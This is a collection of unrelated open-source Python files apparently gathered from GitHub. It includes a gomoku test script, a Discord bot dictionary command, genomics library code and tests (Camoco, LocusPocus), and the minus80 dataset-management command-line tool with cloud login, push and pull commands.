# *0|1|2|3|4|5|6|7*
# 0 | | | | |w|b| *
# 1 | | | | | | | *
# 2 | | | | | | | *
# 3 | | | | | | | *
# 4 | | | | | | | *
# 5 | |w| | | | | *
# 6 | |w| | | | | *
# 7 | |w| | | | | *
# *****************
# Black stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 0
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
# White stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 1
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
y = 3; x = 5; d_x = -1; d_y = 1; length = 2
put_seq_on_board(board, y, x, d_y, d_x, length, "b")
print_board(board)
analysis(board)
# Expected output:
# *0|1|2|3|4|5|6|7*
# 0 | | | | |w|b| *
# 1 | | | | | | | *
# 2 | | | | | | | *
# 3 | | | | |b| | *
# 4 | | | |b| | | *
# 5 | |w| | | | | *
# 6 | |w| | | | | *
# 7 | |w| | | | | *
# *****************
#
# Black stones:
# Open rows of length 2: 1
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 0
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
# White stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 1
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
#
y = 5; x = 3; d_x = -1; d_y = 1; length = 1
put_seq_on_board(board, y, x, d_y, d_x, length, "b")
print_board(board)
analysis(board) # WHY ARE THERE SEMISCOLONS!!!!!!!!!!!!!!!!!!!!!!!!
# Expected output:
# *0|1|2|3|4|5|6|7*
# 0 | | | | |w|b| *
# 1 | | | | | | | *
# 2 | | | | | | | *
# 3 | | | | |b| | *
# 4 | | | |b| | | *
# 5 | |w|b| | | | *
# 6 | |w| | | | | *
# 7 | |w| | | | | *
# *****************
#
#
# Black stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 1
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
# White stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 1
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
if __name__ == '__main__':
play_gomoku(8)
``` |
{
"source": "jonah-chen/eve-bot",
"score": 3
} |
#### File: eve-bot/cogs/define.py
```python
import nextcord
from nextcord.ext import commands
from bs4 import BeautifulSoup
import urllib.request
from PyDictionary import PyDictionary # install Pydictionary
dictionary = PyDictionary()
def get_definition(words):
word = "-".join(words)
url = "https://www.dictionary.com/browse/" + word
try:
htmlfile = urllib.request.urlopen(url)
soup = BeautifulSoup(htmlfile, "lxml")
definition = soup.find(class_="one-click-content css-nnyc96 e1q3nk1v1")
return definition, soup
except:
return None, None
class Dictionary(commands.Cog):
"""
Dictionary definitions
"""
def __init__(self, client):
self.client = client
@commands.command(usage="<word>", aliases=["definition", "def"])
async def define(self, ctx, *, word):
"""
Define a word.
"""
# First check how many words there are
words = word.split()
if len(words) == 1 and dictionary.meaning(words[0]) != None:
word = words[0]
await ctx.send("One second...")
nouns = []
verbs = []
adjectives = []
adverbs = []
# Create embed
dict_embed = nextcord.Embed(
title = "Dictionary Definition",
description = f"Query: {word}",
colour = 0x0adbfc
)
dict_embed.set_thumbnail(url="https://media.discordapp.net/attachments/952037974420385793/952038039457267712/Eve_Code_Ultimate_2.png")
dict_embed.set_footer(text="Github: https://github.com/Chubbyman2/eve-bot")
if word.lower() == "praxis":
nouns.append(
"the worst course in the Engineering Science program")
elif word.lower() == "calculus":
nouns.append(
"the most rigorous course in the Engineering Science program")
for key in dictionary.meaning(word):
if key == "Noun":
for definition in dictionary.meaning(word)[key]:
nouns.append(definition)
elif key == "Verb":
for definition in dictionary.meaning(word)[key]:
verbs.append(definition)
elif key == "Adjective":
for definition in dictionary.meaning(word)[key]:
adjectives.append(definition)
elif key == "Adverb":
for definition in dictionary.meaning(word)[key]:
adverbs.append(definition)
if len(nouns) != 0:
for noun in nouns:
temp = noun
for letter in noun:
if letter == "(":
noun += ")"
nouns[nouns.index(temp)] = noun
dict_embed.add_field(name="Nouns", value="```-" + "\n-".join(nouns) + "```", inline=False)
if len(verbs) != 0:
for verb in verbs:
temp = verb
for letter in verb:
if letter == "(":
verb += ")"
verbs[verbs.index(temp)] = verb
dict_embed.add_field(name="Verbs", value="```-" + "\n-".join(verbs) + "```", inline=False)
if len(adjectives) != 0:
for adjective in adjectives:
temp = adjective
for letter in adjective:
if letter == "(":
adjective += ")"
adjectives[adjectives.index(temp)] = adjective
dict_embed.add_field(name="Adjectives", value="```-" + "\n-".join(adjectives) + "```", inline=False)
if len(adverbs) != 0:
for adverb in adverbs:
temp = adverb
for letter in adverb:
if letter == "(":
adverb += ")"
adverbs[adverbs.index(temp)] = adverb
dict_embed.add_field(name="Adverbs", value="```-" + "\n-".join(adverbs) + "```", inline=False)
await ctx.send(embed=dict_embed)
# If it's more than one word
else:
await ctx.send("One second...")
# Create embed
embed_query = " ".join(words)
dict_embed = nextcord.Embed(
title = "Dictionary Definition",
description = f"Query: {embed_query}",
colour = 0x0adbfc
)
dict_embed.set_thumbnail(url="https://media.discordapp.net/attachments/952037974420385793/952038039457267712/Eve_Code_Ultimate_2.png")
dict_embed.set_footer(text="Github: https://github.com/Chubbyman2/eve-bot")
if get_definition(words)[0] == None:
try:
word = get_definition(words)[1].find(class_="kw")
word = word.get_text()
words = word.split(" ")
if get_definition(words)[0] != None:
definition = get_definition(words)[0]
definition = definition.get_text()
dict_embed.add_field(name="Definition", value="```" + str(definition) + "```", inline=False)
await ctx.send(embed=dict_embed)
return
else:
await ctx.send(f"Apologies, I could not find the definition for {' '.join(words)}.")
return
except AttributeError:
await ctx.send(f"Apologies, I could not find the definition for {' '.join(words)}.")
return
else:
definition = get_definition(words)[0]
definition = definition.get_text()
dict_embed.add_field(name="Definition", value="```" + str(definition) + "```", inline=False)
await ctx.send(embed=dict_embed)
def setup(client):
client.add_cog(Dictionary(client))
``` |
{
"source": "jonahcullen/Camoco",
"score": 2
} |
#### File: Camoco/tests/test_Expr.py
```python
import pytest
import numpy as np
def test_nans_in_same_place(testCOB):
norm_expr = testCOB.expr(raw=False)
raw_expr = testCOB.expr(raw=True).ix[norm_expr.index,norm_expr.columns]
assert all(np.isnan(norm_expr) == np.isnan(raw_expr))
assert all(np.isnan(raw_expr) == np.isnan(norm_expr))
def test_inplace_nansort(testCOB):
x = np.random.rand(50000)
for i in np.random.randint(0,50000,500):
x[i] = np.nan
sorted_x = testCOB.inplace_nansort(x)
assert all(np.isnan(x) == np.isnan(sorted_x))
```
#### File: Camoco/tests/test_Locus.py
```python
import pytest
from itertools import chain
from camoco import Locus
from camoco.Config import cf
@pytest.fixture
def simple_Locus():
return Locus(1,100,200)
@pytest.fixture
def LocusX():
return Locus(1,100,200)
@pytest.fixture
def LocusY():
return Locus(1,300,400)
def test_locus_initialization(simple_Locus):
# numeric chromosomes
assert simple_Locus.chrom == '1'
assert simple_Locus.start == 100
assert simple_Locus.end == 200
assert len(simple_Locus) == 101
def test_distance_between_loci():
x = Locus(1,100,200)
y = Locus(1,300,400)
assert x - y == 99
def test_combine_loci(LocusX,LocusY):
z = LocusX + LocusY
assert len(z) == 301
def test_candidate_vs_bootstrap_length(testRefGen,testGWAS):
Term = next(testGWAS.iter_terms())
snps = Term.effective_loci(window_size=50000)
candidates = testRefGen.candidate_genes(snps,chain=False)
bootstraps = testRefGen.bootstrap_candidate_genes(snps,chain=False)
# Make sure we are pulling out the same number of random genes for
# Each locus
for c,b in zip(candidates,bootstraps):
assert len(c) == len(b)
assert len(set(chain(*candidates))) == len(set(chain(*bootstraps)))
def test_generate_from_id(Zm5bFGS):
random_gene = Zm5bFGS.random_gene()
assert random_gene == Zm5bFGS[random_gene.id]
```
#### File: Camoco/tests/test_Term.py
```python
import pytest
from camoco import Term
from camoco import Locus
@pytest.fixture
def testTerm():
loci = [
# Overlapping Loci, No windows
Locus(1,100,500,score=0), Locus(1,400,700,score=5),
# Loci with Overlapping windows
Locus(2,100,200,window=100,score=0),
Locus(2,300,500,window=100,score=5),
# SNPs with overlapping windows
Locus(3,100,window=50,score=5),
Locus(3,200,window=50,score=0),
# Three overlapping loci, one not
Locus(4,100,window=80,score=1),
Locus(4,200,window=80,score=2),
Locus(4,300,window=80,score=3),
Locus(4,400,window=10,score=4) # <- one not
]
return Term('test',desc='hello',loci=loci,attr1=True,attr2=False)
def test_init():
x = Term('testTerm',desc='for testing',loci=[Locus(1,2),Locus(1,3)],foo='bar')
def test_term_init(testTerm):
assert testTerm.id == 'test'
assert testTerm.desc == 'hello'
assert testTerm['attr1'] == True
assert testTerm['attr2'] == False
def test_add_Locus(testTerm):
new_locus = Locus(6,100)
testTerm.add_locus(new_locus)
assert new_locus in testTerm.loci
testTerm.loci.remove(new_locus)
def test_term_len(testTerm):
assert len(testTerm) == len(testTerm.loci)
def test_effective_loci(testTerm):
assert len(testTerm.effective_loci()) == 5
def test_effective_loci_custom_windoe(testTerm):
assert len(testTerm.effective_loci(window_size=150)) == 4
def test_effective_loci_lens(testTerm):
assert list(map(len,testTerm.effective_loci())) == [601,401,101,201,1]
def test_strongest_loci(testTerm):
assert list(
map(lambda x:x.start, testTerm.strongest_loci('score',lowest=False))
) == [400,300,100,300,400]
def test_flanking_loci(testTerm):
assert len(testTerm.flanking_loci(Locus(4,250),window_size=100)) == 2
assert len(testTerm.flanking_loci(Locus(4,250),window_size=400)) == 4
def test_copy(testTerm):
copy = testTerm.copy()
assert len(copy) == len(testTerm)
def test_str(testTerm):
assert isinstance(str(testTerm),str)
def test_repr(testTerm):
assert isinstance(repr(testTerm),str)
``` |
{
"source": "jonahcullen/LocusPocus",
"score": 2
} |
#### File: LocusPocus/locuspocus/Exceptions.py
```python
class ZeroWindowError(Exception): # pragma: no cover
def __init__(self,expr,message,*args):
self.expr = expr
self.message = (
'Operation requiring window, but window is 0:' + \
message.format(args)
)
```
#### File: LocusPocus/locuspocus/Fasta.py
```python
from collections import defaultdict
import logging
import re
import numpy as np
from minus80 import Freezable
from minus80.RawFile import RawFile
import reprlib
import pprint
from functools import lru_cache
from locuspocus import Chromosome
class Fasta(Freezable):
'''
A pythonic interface to a FASTA file. This interface
allows convenient slicing into contigs (chromosomes).
>>> from locuspocus import Fasta
>>> x = Fasta.from_file('example.fa')
'''
log = logging.getLogger(__name__)
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
)
handler.setFormatter(formatter)
if not len(log.handlers):
log.addHandler(handler)
log.setLevel(logging.INFO)
def __init__(self,name,parent=None):
'''
Load a Fasta object from the Minus80.
Parameters
----------
name : str
The name of the frozen object
Returns
-------
A Fasta object
'''
super().__init__(name,parent=parent)
# Load up from the database
self._initialize_tables()
def _initialize_tables(self):
'''
Initialize the tables for the FASTA class
NOTE: internal method
'''
cur = self._db.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS added_order (
aorder INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT
);
''')
cur.execute('''
CREATE TABLE IF NOT EXISTS nicknames (
nickname TEXT,
chrom TEXT,
PRIMARY KEY(nickname,chrom),
FOREIGN KEY(chrom) REFERENCES chroms(chrom)
)
''')
cur.execute('''
CREATE TABLE IF NOT EXISTS attributes (
chrom TEXT,
attribute TEXT,
PRIMARY KEY(chrom,attribute),
FOREIGN KEY(chrom) REFERENCES chroms(chrom)
)
''')
def add_chrom(self,chrom,cur=None,force=False):
'''
Add a chromosome to the Fasta object.
Parameters
----------
name : str
The name of the chromosome
'''
self.log.info(f'Adding {chrom.name}')
# Check for duplicates
if chrom.name in self:
if not force:
raise ValueError(f'{chrom.name} already in FASTA')
else:
if cur is None:
cur = self._db.cursor()
cur.execute(
'''
INSERT OR REPLACE INTO added_order
(name)
VALUES (?)
''',(chrom.name,)
)
for x in chrom._attrs:
self._add_attribute(chrom.name,x)
seqarray = np.array(chrom.seq)
self._bcolz_array(chrom.name,seqarray)
self.cache_clear()
def chrom_names(self):
'''
Returns an iterable of chromosome names
Parameters
----------
None
Returns
-------
An iterable of chromosome names in added order
'''
return (x for (x,) in self._db.cursor().execute('''
SELECT name FROM added_order ORDER BY aorder
'''))
def cache_clear(self):
self.__getitem__.cache_clear()
@classmethod
def from_file(cls,name,fasta_file,force=False,parent=None):
'''
Create a Fasta object from a file.
'''
self = cls(name,parent=parent)
with RawFile(fasta_file) as IN, self._db as db:
cur = db.cursor()
cur_chrom = None
seqs = []
name, attrs = None,None
for line in IN:
line = line.strip()
if line.startswith('>'):
# Finish the last chromosome before adding a new one
if len(seqs) > 0:
cur_chrom = Chromosome(name,seqs,*attrs)
self.add_chrom(cur_chrom,cur=cur,force=force)
seqs = []
name,*attrs = line.lstrip('>').split()
else:
seqs += line
#cur_chrom.seq = np.append(cur_chrom.seq,list(line))
# Add the last chromosome
cur_chrom = Chromosome(name,seqs,*attrs)
self.add_chrom(cur_chrom,cur=cur,force=force)
return self
def __iter__(self):
'''
Iterate over chromosome objects
'''
chroms = self._db.cursor().execute('SELECT name FROM added_order ORDER BY aorder')
for (chrom,) in chroms:
yield self[chrom]
def __len__(self):
'''
Returns the number of chroms in the Fasta
'''
return self._db.cursor().execute('''
SELECT COUNT(*) FROM added_order
''').fetchone()[0]
def __contains__(self,obj):
'''
Returns boolean indicating if a named
contig (chromosome) is in the fasta.
'''
if isinstance(obj,Chromosome):
obj = obj.name
cur = self._db.cursor()
# Check if in chrom names
in_added = cur.execute('''
SELECT COUNT(*) FROM added_order
WHERE name = ?
''',(obj,)).fetchone()[0]
if in_added == 1:
return True
# Check if in aliases
in_alias = cur.execute('''
SELECT COUNT(*) FROM nicknames
WHERE nickname = ?
''',(obj,)).fetchone()[0]
if in_alias == 1:
return True
# Otherise its not here
return False
@lru_cache(maxsize=128)
def __getitem__(self,chrom_name):
if chrom_name not in self:
raise ValueError(f'{chrom_name} not in {self._m80_name}')
try:
seq_array = self._bcolz_array(chrom_name)
except Exception as e:
chrom_name = self._get_nickname(chrom_name)
seq_array = self._bcolz_array(chrom_name)
finally:
attrs = [x[0] for x in self._db.cursor().execute('''
SELECT attribute FROM attributes
WHERE chrom = ?
ORDER BY rowid -- This preserves the ordering of attrs
''',(chrom_name,))]
return Chromosome(chrom_name,seq_array,*attrs)
def to_fasta(self,filename,line_length=70):
'''
Print the chromosomes to a file in FASTA format
Paramaters
----------
filename : str
The output filename
line_length : int (default: 70)
The number of nucleotides per line
Returns
-------
None
'''
with open(filename,'w') as OUT:
for chrom_name in self.chrom_names():
print(f'Printing out {chrom_name}')
chrom = self[chrom_name]
#easy_id = ids[chrom_name]
start_length = len(chrom)
#if easy_id == 'chrUn':
# easy_id = easy_id + '_' + chrom_name
print(f'>{chrom_name} {"|".join(chrom._attrs)}',file=OUT)
printed_length = 0
for i in range(0,len(chrom),70):
sequence = chrom.seq[i:i+70]
print(''.join(sequence),file=OUT)
printed_length += len(sequence)
if printed_length != start_length:
raise ValueError('Chromosome was truncated during printing')
return None
def _add_attribute(self,chrom_name,attr,cur=None):
'''
Add an attribute the the Fasta object.
Attributes describe chromosomes and
often follow the '>' token in the FASTA file.
Parameters
----------
chrom_name : str
The name of the chromosome you are adding
an attribute to
attr : str
the attribute you are adding
'''
if cur is None:
cur = self._db.cursor()
cur.execute(
'''
INSERT INTO attributes
(chrom,attribute)
VALUES (?,?)
''',
(chrom_name,attr)
)
self.cache_clear()
def _add_nickname(self,chrom,nickname,cur=None):
'''
Add a nickname for a chromosome
Parameters
----------
chrom : str
The chromosome you want to nickname
nickname : str
The alternative name for the chromosome
'''
if cur is None:
cur = self._db.cursor()
cur.execute(
'''
INSERT OR REPLACE INTO nicknames
(nickname,chrom)
VALUES (?,?)
''',
(nickname,chrom)
)
def _get_nickname(self,nickname):
'''
Get a chromosomem name by nickname
'''
return self._db.cursor().execute('''
SELECT chrom FROM nicknames
WHERE nickname = ?
''',(nickname,)).fetchone()[0]
def __repr__(self): #pragma: nocover
return pprint.saferepr(
reprlib.repr(list(self))
)
```
#### File: LocusPocus/locuspocus/Term.py
```python
import logging
import numpy as np
class Term(object):
'''
A Term is a just named group of loci that are related.
NOTE: this is different that a RefLoci obect which is a
named set of **reference** loci. Loci within a term
are somehow related ouside the context of the whole
genome, for instance, in some biological function.
Parameters
----------
id : unique identifier
desc: short description
loci : iterable of loci objects that are related
** kwargs : dictionary of other term attributes
Returns
-------
A Term Object
'''
# Create a class-wide logger
log = logging.getLogger(__name__)
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
)
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.INFO)
def __init__(self, id, desc='', loci=None, **kwargs):
self.id = id
self.desc = desc
self.attrs = {}
self.loci = set()
if loci:
self.loci = set(loci)
for key, val in kwargs.items():
self.attrs[key] = val
@property
def locus_list(self): #pragma: no cover
raise Exception('This is deprecated')
def __len__(self):
'''
Returns the number of loci in the term.
'''
return len(self.loci)
def __getitem__(self,key):
return self.attrs[key]
def add_locus(self, locus):
'''
Adds a locus to the Term.
'''
self.loci.add(locus)
def flanking_loci(self, locus, window_size=100000):
'''
returns any nearby Term SNPs to a locus
'''
return [flank for flank in self.loci if abs(locus-flank) <= window_size]
def copy(self,id=None,desc='',loci=None,**kwargs):
'''
Creates a copy of a term with the option to
expand loci and attrs.
Parameters
----------
name : str
A required name for the new term.
desc : str
An optional short description for the term.
loci : iterable of co.Loci objects
These loci will be added to the Term object
in addition to the loci objects that were
in the original Term.
**kwargs : key value pairs
Additional key value pairs will be added
as attributes to the term object.
Returns
-------
A Term object.
'''
if id == None:
id = self.id
if loci == None:
loci = set()
loci = self.loci.union(loci)
new_attrs = self.attrs.copy()
new_attrs.update(**kwargs)
copy = Term(
id,
desc=desc,
loci=loci,
**new_attrs
)
return copy
def effective_loci(self, window_size=None):
'''
Collapse down loci that have overlapping windows into
'effective' loci. Looks like:
Locus1: |--------o-------|
Locus2: |--------o--------|
Locus3: |--------o--------|
Effective: |--------o---+----------------o--------|
Legend: '|' : Window edge, used to collapse
'o' : 'Locus' edge (SNPs in this case)
'+' : Sub loci, kept for downstream analysis
Parameters
----------
window_size : int (default: None)
If not None, maps a new window size to each locus.
'''
loci = sorted(self.loci)
if window_size is not None:
for locus in loci:
locus.window = window_size
collapsed = [loci.pop(0)]
for locus in loci:
# if they have overlapping windows, collapse
if locus in collapsed[-1]:
# Collapse if the windows overlap
collapsed[-1] = collapsed[-1] + locus
else:
collapsed.append(locus)
log('{}: Found {} SNPs -> {} effective SNPs with window size {} bp',
self.id, len(self.loci), len(collapsed), window_size
)
return collapsed
def strongest_loci(self, attr, window_size=None,lowest=True):
'''
Collapses down loci that have overlapping windows,
then returns the locus with the strongest 'attr'
value. Looks like:
Locus1: |--------o-------| (attr: 7)
Locus2: |--------o--------| (attr: 2)
Locus3: |--------o--------| (attr: 8)
Strongest: |--------o-------| |--------o--------|
Legend: '|' : Window edge, used to collapse
'o' : 'Locus' edge (SNPs in this case)
Parameters
----------
attr : str
The locus attribute to use to determine the 'strongest'
window_size : int (default: None)
If not None, maps a new window size to each locus.
lowest: bool (default: True)
When sorting by attr, lowest is strongest (i.e. p-vals)
'''
is_reverse = not lowest
return [
# sort by attr and take first item
sorted(
locus.sub_loci,
key=lambda x: float(x.default_getitem(attr,np.inf)),
reverse=is_reverse
)[0] for locus in self.effective_loci(window_size=window_size)
]
def __str__(self):
return "Term: {}, Desc: {}, {} Loci".format(self.id, self.desc, len(self))
def __repr__(self):
return str(self.id)
```
#### File: LocusPocus/tests/conftest.py
```python
import pytest
import os
from locuspocus import Locus
from locuspocus import RefLoci
from locuspocus import Fasta
import minus80.Tools as m80tools
from locuspocus.Fasta import Chromosome
@pytest.fixture(scope='module')
def simpleRefLoci():
m80tools.delete('RefLoci','simpleRefLoci',force=True)
# Create a Locus
a = Locus(1,100,150, id='gene_a')
# Create a couple more!
b = Locus(1,160,175, id='gene_b')
c = Locus(1,180,200, id='gene_c')
d = Locus(1,210,300, id='gene_d')
e = Locus(2,100,150, id='gene_e')
x = RefLoci('simpleRefLoci')
x.add_loci([a,b,c,d,e])
return x
@pytest.fixture(scope="module")
def testRefGen():
# We have to build it
m80tools.delete('RefLoci','Zm5bFGS',force=True)
gff = os.path.expanduser(
os.path.join(
'raw', 'ZmB73_5b_FGS.gff.gz'
)
)
x = RefLoci('Zm5bFGS')
if len(x) == 0:
x.add_gff(
gff
)
return x
@pytest.fixture(scope='module')
def m80_Fasta():
'''
Create a Fasta which doesn't get
returned. Access the Fasta through
the m80 API
'''
# delete the onl
m80tools.delete('Fasta','ACGT',force=True)
f = Fasta.from_file('ACGT','raw/ACGT.fasta')
return True
@pytest.fixture(scope='module')
def smpl_fasta():
''' A simple fasta that agrees with smpl_annot'''
m80tools.delete('Fasta','smpl_fasta',force=True)
fasta = Fasta('smpl_fasta')
chr1 = Chromosome('chr1','A'*500000)
chr2 = Chromosome('chr2','C'*500000)
chr3 = Chromosome('chr3','G'*500000)
chr4 = Chromosome('chr4','T'*500000)
fasta.add_chrom(chr1)
fasta.add_chrom(chr2)
fasta.add_chrom(chr3)
fasta.add_chrom(chr4)
fasta._add_nickname('chr1','CHR1')
fasta._add_attribute('chr1','foobar')
return fasta
``` |
{
"source": "jonahcullen/Minus80",
"score": 3
} |
#### File: minus80/cli/minus80.py
```python
import os
import json
import click
import minus80 as m80
import minus80.Tools
from pathlib import Path
from minus80.Exceptions import (TagInvalidError,
FreezableNameInvalidError,
TagExistsError,
TagDoesNotExistError,
UserNotLoggedInError,
UserNotVerifiedError,
UnsavedChangesInThawedError)
from requests.exceptions import HTTPError
class NaturalOrderGroup(click.Group):
'''
This subclass orders the commands in the @click.group
in the order in which they are defined in the script
**Ref** https://github.com/pallets/click/issues/513
'''
def list_commands(self, ctx):
return self.commands.keys()
@click.group(
cls=NaturalOrderGroup,
epilog=f"Made with ❤️ in Denver, Colorado"
)
def cli():
"""
\b
__ ____ ____ ____
/ |/ (_)___ __ _______( __ )/ __ \\
/ /|_/ / / __ \/ / / / ___/ /_/ / / / /
/ / / / / / / / /_/ (__ ) /_/ / /_/ /
/_/ /_/_/_/ /_/\__,_/____/\____/\____/
Track, tag, store, and share biological datasets.
See https://github.com/LinkageIO/minus80
for more details.
"""
# ----------------------------
# init Commands
# ----------------------------
@click.command(
short_help='Initialize a new minus80 project'
)
@click.argument(
'name',
)
@click.option(
'--path',
default=None,
help='If specified, the minus80 project directory for NAME will be created here'
)
def init(name,path):
x = m80.Project(name)
if path is not None:
path = str(Path(path)/name)
else:
path = str(Path.cwd()/name)
try:
x.create_link(path)
except ValueError as e:
click.echo(f'cannot create project directroy at: "{path}", directory already exists')
cli.add_command(init)
# ----------------------------
# List Commands
# ----------------------------
@click.command(
short_help="List the available minus80 datasets",
help="Reports the available datasets **Frozen** in the minus80 database.",
)
@click.option(
"--dtype",
default=None,
help=("Each dataset has a datatype associated with it. "
"E.g.: `Cohort`. If no dtype is specified, all "
"available dtypes will be returned."),
)
@click.option(
"--name",
default=None,
help=("The name of the dataset you want to check is available. "
"The default value is the wildcard '*' which will return "
"all available datasets with the specified dtype."),
)
@click.option(
"--tags",
default=False,
is_flag=True,
help=("List available tags of frozen datasets"),
)
def list(name, dtype, tags):
minus80.Tools.available(dtype=dtype, name=name, tags=tags)
cli.add_command(list)
# ----------------------------
# delete Commands
# ----------------------------
@click.command(help="Delete a minus80 dataset")
@click.argument("slug", metavar="<slug>")
def delete(slug):
# Validate the input
try:
dtype,name,tag = minus80.Tools.parse_slug(slug)
if tag is not None:
raise TagInvalidError()
except (TagInvalidError, FreezableNameInvalidError):
click.echo(
f'Please provide a valid tag in "{slug}"'
)
return 0
# Make sure that the dataset is available
if not minus80.Tools.available(dtype,name):
click.echo(
f'"{dtype}.{name}" not in minus80 datasets! '
'check available datasets with the list command'
)
return 0
else:
minus80.Tools.delete(dtype, name)
cli.add_command(delete)
# ----------------------------
# Freeze Command
# ----------------------------
@click.command(help='Freeze a minus80 dataset')
@click.argument("slug",metavar="<slug>")
def freeze(slug):
# Validate the input
try:
dtype,name,tag = minus80.Tools.parse_slug(slug)
if tag is None:
raise TagInvalidError()
except (TagInvalidError, FreezableNameInvalidError):
click.echo(
f'Please provide a valid tag in "{slug}"'
)
return 0
# Make sure that the dataset is available
if not minus80.Tools.available(dtype,name):
click.echo(
f'"{dtype}.{name}" not in minus80 datasets! '
'check available datasets with the list command'
)
return 0
else:
# Create the minus80
try:
dataset = getattr(minus80,dtype)(name)
except Exception as e:
click.echo(f'Could not build {dtype}.{name}')
raise e
return 1
# Freeze with tag
try:
dataset.m80.freeze(tag)
click.echo(click.style("SUCCESS!",fg="green",bold=True))
except TagExistsError:
click.echo(f'tag "{tag}" already exists for {dtype}.{name}')
cli.add_command(freeze)
@click.command(help='Thaw a minus80 dataset')
@click.argument("slug",metavar="<slug>")
@click.option("--force",is_flag=True,default=False,help='forces a thaw, even if there are unsaved changes',)
def thaw(slug,force):
try:
cwd = Path.cwd().resolve()
except FileNotFoundError as e:
cwd = '/'
try:
dtype,name,tag = minus80.Tools.parse_slug(slug)
if tag is None:
raise TagInvalidError()
except (TagInvalidError, FreezableNameInvalidError):
click.echo(
f'Please provide a valid tag in "{slug}"'
)
return 0
# Make sure that the dataset is available
if not minus80.Tools.available(dtype,name):
click.echo(
f'"{dtype}.{name}" not in minus80 datasets! '
'check available datasets with the list command'
)
return 0
else:
# Create the minus80
try:
dataset = getattr(minus80,dtype)(name)
except Exception as e:
click.echo(f'Could not build {dtype}.{name}')
# Freeze with tag
try:
dataset.m80.thaw(tag,force=force)
click.echo(click.style("SUCCESS!",fg="green",bold=True))
except TagDoesNotExistError:
click.echo(f'tag "{tag}" does not exist for {dtype}.{name}')
return 0
except UnsavedChangesInThawedError as e:
click.secho(
'freeze your current changes or use "force" to dispose of '
'any unsaved changes in current thawed dataset',fg='red'
)
for status,files in {'Changed':e.changed,'New':e.new,'Deleted':e.deleted}.items():
for f in files:
click.secho(f" {status}: {f}",fg='yellow')
return 0
# Warn the user if they are in a directory (cwd) that was deleted
# in the thaw -- theres nothing we can do about this ...
if str(cwd).startswith(str(dataset.m80.thawed_dir)):
click.echo(
'Looks like you are currently in a directory that was just thawed, '
'update your current working directory with, e.g.:\n'
'$ cd `pwd`\n'
f'$ cd {cwd}'
)
cli.add_command(thaw)
# ----------------------------
# Cloud Commands
# ----------------------------
@click.group()
def cloud():
"""
Manage your frozen minus80 datasets in the cloud (minus80.linkage.io).
"""
cli.add_command(cloud)
@click.command()
@click.option('--username',default=None)
@click.option('--password',default=None)
@click.option('--force',is_flag=True,default=False)
@click.option('--reset-password',is_flag=True,default=False)
def login(username,password,force,reset_password):
"""
Log into your cloud account at minus80.linkage.io
"""
cloud = m80.CloudData()
if force:
try:
os.remove(cloud._token_file)
except FileNotFoundError:
pass
try:
# See if currently logged in
cloud.user
except UserNotLoggedInError:
if username is None:
username = click.prompt('Username (email)',type=str)
if password is None:
password = click.prompt('Password', hide_input=True, type=str)
try:
cloud.login(username,password)
except HTTPError as e:
error_code = json.loads(e.args[1])['error']['message']
if error_code == 'INVALID_EMAIL':
click.secho('Error logging in. Invalid email address!.',fg='red')
elif error_code == 'INVALID_PASSWORD':
click.secho('Error logging in. Incorrect Password!',fg='red')
else:
click.secho(f'Error logging in. {error_code}',fg='red')
return 0
account_info = cloud.auth.get_account_info(cloud.user['idToken'])
# double check that the user is verified
if account_info['users'][0]['emailVerified'] == False:
# make sure they have email verified
click.secho("Your email has not been verified!")
if click.confirm('Do you want to resend the verification email?'):
cloud.auth.send_email_verification(cloud._user['idToken'])
click.secho("Please follow the link sent to your email address, then re-run this command")
return 0
click.secho('Successfully logged in',bg='green')
@click.command()
@click.option("--dtype", metavar="<dtype>", default=None)
@click.option("--name", metavar="<name>", default=None)
def list(dtype, name):
"""List available datasets"""
cloud = m80.CloudData()
cloud.list(dtype=dtype, name=name)
@click.command()
@click.argument("slug", metavar="<slug>")
def push(slug):
"""
\b
Push a frozen minus80 dataset to the cloud.
\b
Positional Arguments:
<slug> - A slug of a frozen minus80 dataset
"""
cloud = m80.CloudData()
try:
cloud.user
except UserNotLoggedInError as e:
click.secho("Please log in to use this feature")
try:
dtype,name,tag = minus80.Tools.parse_slug(slug)
if tag is None:
raise TagInvalidError()
except (TagInvalidError, FreezableNameInvalidError):
click.echo(
f'Please provide a valid tag in "{slug}"'
)
return 0
# Make sure that the dataset is available
if not minus80.Tools.available(dtype,name):
click.echo(
f'"{dtype}.{name}" not in minus80 datasets! '
'check available datasets with the list command'
)
return 0
else:
try:
cloud.push(dtype, name, tag)
except TagDoesNotExistError as e:
click.echo(f'tag "{tag}" does not exist for {dtype}.{name}')
@click.command()
@click.argument("dtype", metavar="<dtype>")
@click.argument("name", metavar="<name>")
@click.option("--raw", is_flag=True, default=False, help="Flag to list raw data")
@click.option(
"--output",
default=None,
help="Output filename, defaults to <name>. Only valid with --raw",
)
def pull(dtype, name, raw, output):
"""
Pull a minus80 dataset from the cloud.
"""
cloud = m80.CloudData()
cloud.pull(dtype, name, raw=raw, output=output)
@click.command()
@click.argument("dtype", metavar="<dtype>")
